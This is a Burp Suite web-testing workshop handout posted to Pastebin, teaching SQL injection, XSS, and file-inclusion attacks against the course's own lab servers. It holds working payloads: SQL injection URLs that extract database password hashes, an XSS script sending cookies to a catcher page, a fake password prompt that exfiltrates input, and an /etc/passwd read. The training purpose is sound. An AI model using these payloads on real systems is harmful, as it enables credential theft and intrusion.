Advertisement
nawfling

Burp Suite Workshop V2

Dec 2nd, 2017
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #######################
  2. # Burp Suite Workshop #
  3. #######################
  4.  
  5.  
  6.  
  7.  
  8.  
  9.  
  10. ##################################
  11. # Basic: Web Application Testing #
  12. ##################################
  13.  
  14. Most people are going to tell you reference the OWASP Testing guide.
  15. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  16.  
  17. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  18.  
  19.  
  20. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  21.  
  22. 1. Does the website talk to a DB?
  23. - Look for parameter passing (ex: site.com/page.php?id=4)
  24. - If yes - try SQL Injection
  25.  
  26. 2. Can I or someone else see what I type?
  27. - If yes - try XSS
  28.  
  29. 3. Does the page reference a file?
  30. - If yes - try LFI/RFI
  31.  
  32. Let's start with some manual testing against 45.63.104.73
  33.  
  34.  
  35. #######################
  36. # Attacking PHP/MySQL #
  37. #######################
  38.  
  39. Go to LAMP Target homepage
  40. http://45.63.104.73/
  41.  
  42.  
  43.  
  44. Clicking on the Acer Link:
  45. http://45.63.104.73/acre2.php?lap=acer
  46.  
  47. - Found parameter passing (answer yes to question 1)
  48. - Insert ' to test for SQLI
  49.  
  50. http://45.63.104.73/acre2.php?lap=acer'
  51.  
  52.  
  53. Page returns the following error:
  54. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
  55.  
  56.  
  57.  
  58. In order to perform union-based sql injection - we must first determine the number of columns in this query.
  59. We do this using the ORDER BY
  60. http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
  61.  
  62. Page returns the following error:
  63. Unknown column '100' in 'order clause'
  64.  
  65.  
  66.  
  67. http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
  68.  
  69. Page returns the following error:
  70. Unknown column '50' in 'order clause'
  71.  
  72.  
  73.  
  74. http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
  75. Page returns the following error:
  76. Unknown column '25' in 'order clause'
  77.  
  78.  
  79.  
  80. http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
  81.  
  82. Page returns the following error:
  83. Unknown column '50' in 'order clause'
  84.  
  85.  
  86.  
  87. http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
  88. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  89.  
  90.  
  91.  
  92. Now we build out the union all select statement with the correct number of columns
  93.  
  94. Reference:
  95. http://www.techonthenet.com/sql/union.php
  96.  
  97.  
  98.  
  99. http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  100.  
  101.  
  102.  
  103. Now we negate the parameter value 'acer' by turning into the word 'null':
  104. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  105.  
  106. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  107.  
  108.  
  109. Use a cheat sheet for syntax:
  110. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  111.  
  112.  
  113. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  114.  
  115. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  116.  
  117. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
  118.  
  119. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
  120.  
  121.  
  122. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
  123.  
  124.  
  125.  
  126. ########################
  127. # Question I get a lot #
  128. ########################
  129. Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
  130.  
  131. Here is a good reference for it:
  132. https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
  133.  
  134. Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
  135.  
  136.  
  137.  
  138.  
  139. #############################
  140. # Error-Based SQL Injection #
  141. #############################
  142. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  143. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  144. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  145. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  146. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  147. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  148. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  149. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  150. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  151.  
  152.  
  153.  
  154.  
  155. #############################
  156. # Union-Based SQL Injection #
  157. #############################
  158. http://54.245.184.121/bookdetail.aspx?id=2 order by 100--
  159. http://54.245.184.121/bookdetail.aspx?id=2 order by 50--
  160. http://54.245.184.121/bookdetail.aspx?id=2 order by 25--
  161. http://54.245.184.121/bookdetail.aspx?id=2 order by 10--
  162. http://54.245.184.121/bookdetail.aspx?id=2 order by 5--
  163. http://54.245.184.121/bookdetail.aspx?id=2 order by 6--
  164. http://54.245.184.121/bookdetail.aspx?id=2 order by 7--
  165. http://54.245.184.121/bookdetail.aspx?id=2 order by 8--
  166. http://54.245.184.121/bookdetail.aspx?id=2 order by 9--
  167. http://54.245.184.121/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  168.  
  169. We are using a union select statement because we are joining the developer's query with one of our own.
  170. Reference:
  171. http://www.techonthenet.com/sql/union.php
  172. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  173. It removes duplicate rows between the various SELECT statements.
  174.  
  175. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  176.  
  177. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  178.  
  179. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  180.  
  181. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  182. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  183. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  184. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  185.  
  186.  
  187.  
  188.  
  189.  
  190. - Another way is to see if you can get the backend to perform an arithmetic function
  191. http://54.245.184.121/bookdetail.aspx?id=(2)
  192. http://54.245.184.121/bookdetail.aspx?id=(4-2)
  193. http://54.245.184.121/bookdetail.aspx?id=(4-1)
  194.  
  195.  
  196.  
  197. http://54.245.184.121/bookdetail.aspx?id=2 or 1=1--
  198. http://54.245.184.121/bookdetail.aspx?id=2 or 1=2--
  199. http://54.245.184.121/bookdetail.aspx?id=1*1
  200. http://54.245.184.121/bookdetail.aspx?id=2 or 1 >-1#
  201. http://54.245.184.121/bookdetail.aspx?id=2 or 1<99#
  202. http://54.245.184.121/bookdetail.aspx?id=2 or 1<>1#
  203. http://54.245.184.121/bookdetail.aspx?id=2 or 2 != 3--
  204. http://54.245.184.121/bookdetail.aspx?id=2 &0#
  205.  
  206.  
  207.  
  208.  
  209.  
  210. ###############################
  211. # Blind SQL Injection Testing #
  212. ###############################
  213. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  214.  
  215. 3 - Total Characters
  216. http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  217. http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  218. http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  219.  
  220. Let's go for a quick check to see if it's DBO
  221. http://54.245.184.121/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  222.  
  223. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  224.  
  225. D - 1st Character
  226. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  227. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  228. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  229. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  230.  
  231. B - 2nd Character
  232. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  233. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  234.  
  235. O - 3rd Character
  236. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  237. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  238. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  239. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  240. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  241. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
  242. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  243.  
  244.  
  245. ###############################################################################
  246. # What is XSS #
  247. # https://infosecaddictsfiles.blob.core.windows.net/files/2-Intro_To_XSS.pptx #
  248. ###############################################################################
  249.  
  250. OK - what is Cross Site Scripting (XSS)
  251.  
  252. 1. Use Firefox to browse to the following location:
  253.  
  254. http://45.63.104.73/xss_practice/
  255.  
  256. A really simple search page that is vulnerable should come up.
  257.  
  258.  
  259.  
  260.  
  261. 2. In the search box type:
  262.  
  263. <script>alert('So this is XSS')</script>
  264.  
  265.  
  266. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  267. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  268.  
  269.  
  270. 3. In the search box type:
  271.  
  272. <script>alert(document.cookie)</script>
  273.  
  274.  
  275. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  276. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  277.  
  278. 4. Now replace that alert script with:
  279.  
  280. <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  281.  
  282.  
  283. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  284.  
  285.  
  286. 5. Now view the stolen cookie at:
  287. http://45.63.104.73/xss_practice/cookie_stealer_logs.html
  288.  
  289.  
  290. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  291.  
  292.  
  293.  
  294.  
  295.  
  296.  
  297. ############################
  298. # A Better Way To Demo XSS #
  299. ############################
  300.  
  301.  
  302. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  303.  
  304.  
  305. Use Firefox to browse to the following location:
  306.  
  307. http://45.63.104.73/xss_practice/
  308.  
  309.  
  310.  
  311. Paste this in the search box
  312. ----------------------------
  313.  
  314.  
  315.  
  316. <script>
  317. password=prompt('Your session is expired. Please enter your password to continue',' ');
  318. document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
  319. </script>
  320.  
  321.  
  322. Now view the stolen cookie at:
  323. http://45.63.104.73/xss_practice/passwords.html
  324.  
  325.  
  326. #########################
  327. # File Handling Attacks #
  328. #########################
  329.  
  330. Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
  331. http://45.63.104.73/showfile.php?filename=about.txt
  332.  
  333.  
  334.  
  335. See if you can read files on the file system:
  336. http://45.63.104.73/showfile.php?filename=/etc/passwd
  337.  
  338. We call this attack a Local File Include or LFI.
  339.  
  340. Now let's find some text out on the internet somewhere:
  341. https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
  342.  
  343.  
  344. Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
  345. http://45.63.104.73/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
  346.  
  347.  
  348.  
  349.  
  350.  
  351. #########################
  352. # Setting up Burp Suite #
  353. #########################
  354. Download the latest free version of FoxyProxy at https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  355.  
  356. Download the latest free version of Burp at https://portswigger.net/burp/freedownload
  357.  
  358. Be sure to download the appropriate version for your computer system/OS.
  359.  
  360. Make sure that burpsuite_free_v1.7.27.jar is set as executable (chmod +x burpsuite_free_v1.7.27.jar) and then run:
  361.  
  362. java -jar burpsuite_free_v1.7.27.jar
  363.  
  364. - Click the "Proxy" tab
  365. - Click the "Options" sub tab
  366. - Click “Edit” in the “Proxy Listeners” section
  367. - In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only”
  368. - In the same pop up make sure that the bind port is 8080
  369. - In the same pop up select the “Certificate” tab
  370. - Ensure that burp is configured to "generate CA-signed per-host certificates"
  371.  
  372. Open Firefox
  373. - Click "Edit"
  374. - Click “Preferences"
  375. - Click the "Advanced" tab
  376. - Click the "Network" sub tab
  377. - Click the connection "settings" button
  378. - Click "manual proxy configuration"
  379. set it to 127.0.0.1 port 8080
  380. check "Use this proxy server for all protocols"
  381. - Remove both the "localhost, 127.0.0.1" text from the "No Proxy For:" line
  382.  
  383.  
  384. Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.
  385.  
  386. Visit any SSL-protected URL.
  387.  
  388. On the “This Connection is Untrusted” screen, click on “Add Exception”
  389. Click "Get Certificate", then click "View".
  390.  
  391. In the “Details” tab, select the root certificate in the tree (PortSwigger CA).
  392.  
  393. Click "Export" and save the certificate as "BurpCert" on the Desktop.
  394.  
  395. Close Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog
  396. Go to Edit | Preferences
  397. Click “Advanced” and go to “Certificates” tab
  398. Click “View Certificates”
  399.  
  400. Click "Import" and select the certificate file that you previously saved.
  401.  
  402. On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".
  403.  
  404. Close all dialogs and restart Firefox
  405.  
  406.  
  407.  
  408.  
  409.  
  410. ###############################################################
  411. # Question 1: What is the process that you use when you test? #
  412. ###############################################################
  413.  
  414. Step 1: Automated Testing
  415.  
  416. Step 1a: Web Application vulnerability scanners
  417. -----------------------------------------------
  418. - Run two (2) unauthenticated vulnerability scans against the target
  419. - Run two (2) authenticated vulnerability scans against the target with low-level user credentials
  420. - Run two (2) authenticated vulnerability scans against the target with admin privileges
  421.  
  422. The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
  423.  
  424. A good web application vulnerability scanner comparison website is here:
  425. http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
  426.  
  427.  
  428. Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  429.  
  430. When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  431.  
  432.  
  433. Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
  434.  
  435.  
  436. Also, be sure to save the scan results and logs. I usually provide this data to the customer.
  437.  
  438.  
  439.  
  440. Step 1b: Directory Brute Forcer
  441. -------------------------------
  442. I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
  443.  
  444.  
  445.  
  446. Step 2: Manual Testing
  447.  
  448. Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
  449.  
  450. Step 2a: Spider/Scan the entire site with Burp Suite
  451. Save the spider and scan results. I usually provide this data to the customer as well.
  452.  
  453.  
  454. Step 2b: Browse through the site using the 3 question method
  455. Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
  456.  
  457. Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
  458.  
  459. Here is what I mean:
  460. http://www.site.com/page.aspx?parametername=parametervalue
  461.  
  462. When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
  463.  
  464. http://www.site.com/page.aspx?parametername=[ payload ]
  465.  
  466. You need to ensure that you send the payload this way, and like this below:
  467.  
  468. http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
  469.  
  470. This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
  471.  
  472.  
  473.  
  474.  
  475.  
  476.  
  477.  
  478. ###########################################
  479. # Question 2: How much fuzzing is enough? #
  480. ###########################################
  481. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  482.  
  483. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  484.  
  485.  
  486. Step 1: Ask yourself the 3 questions per page of the site.
  487.  
  488. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  489.  
  490. Step 3: When you load your fuzz strings - use the following decision tree
  491.  
  492. - Are the fuzz strings causing a default error message (example 404)?
  493. - If this is the case then it is most likely NOT vulnerable
  494.  
  495. - Are the fuzz strings causing a WAF or LB custom error message?
  496. - If this is the case then you need to find an encoding method to bypass
  497.  
  498.  
  499. - Are the fuzz strings causing an error message that discloses the backend type?
  500. - If yes, then identify DB type and find correct syntax to successfully exploit
  501. - Some example strings that I use are:
  502. '
  503. "
  504. () <----- Take the parameter value and put it in parenthesis
  505. (5-1) <----- See if you can perform an arithmetic function
  506.  
  507.  
  508. - Are the fuzz strings rendering executable code?
  509. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  510. - Some example strings that I use are:
  511. <b>hello</b>
  512. <u>hello</u>
  513. <script>alert(123);</script>
  514. <script>alert(xss);</script>
  515. <script>alert('xss');</script>
  516. <script>alert("xss");</script>
  517.  
  518.  
  519.  
  520.  
  521.  
  522.  
  523.  
  524. -------------------------------------------------------------------------------------------
  525.  
  526.  
  527.  
  528.  
  529.  
  530.  
  531. ************************ Class Homework ************************
  532.  
  533. Day 1 Homework:
  534. ---------------
  535. Here is a good reference of how to use Burp to look for OWASP Top 10 vulnerabilities:
  536. https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten
  537.  
  538.  
  539. Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:
  540. http://45.63.104.73/
  541. http://54.245.184.121/
  542.  
  543. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day1-Homework.docx)
  544.  
  545.  
  546.  
  547. ************************ Class Challenge ************************
  548.  
  549. Let's see how you do with someone else's vulnerable website. Your 1st target is: http://zero.webappsecurity.com
  550.  
  551. Here are some sample web app penetration test reports from other companies that you can look at:
  552. https://s3.amazonaws.com/infosecaddictsfiles/WebAppSampleReports.zip
  553.  
  554. I want you to perform a penetration test against http://zero.webappsecurity.com and document the engagement as if it were a real project.
  555.  
  556. ---------------------------------------------------------------------------------------------------------
  557. #############################
  558. # Tricky stuff to play with #
  559. #############################
  560.  
  561.  
  562.  
  563.  
  564.  
  565. ###################
  566. # Nikto with Burp #
  567. # in Linux #
  568. ###################
  569.  
  570. cd ~/toolz/
  571.  
  572. rm -rf nikto*
  573.  
  574. git clone https://github.com/sullo/nikto.git Nikto2
  575.  
  576. cd Nikto2/program
  577.  
  578. perl nikto -h http://zero.webappsecurity.com -useproxy http://localhost:8080/
  579.  
  580. -----------------
  581. Masking the Nikto header reference:
  582. http://carnal0wnage.attackresearch.com/2009/09/btod-nikto-thru-burp-masking-nikto.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement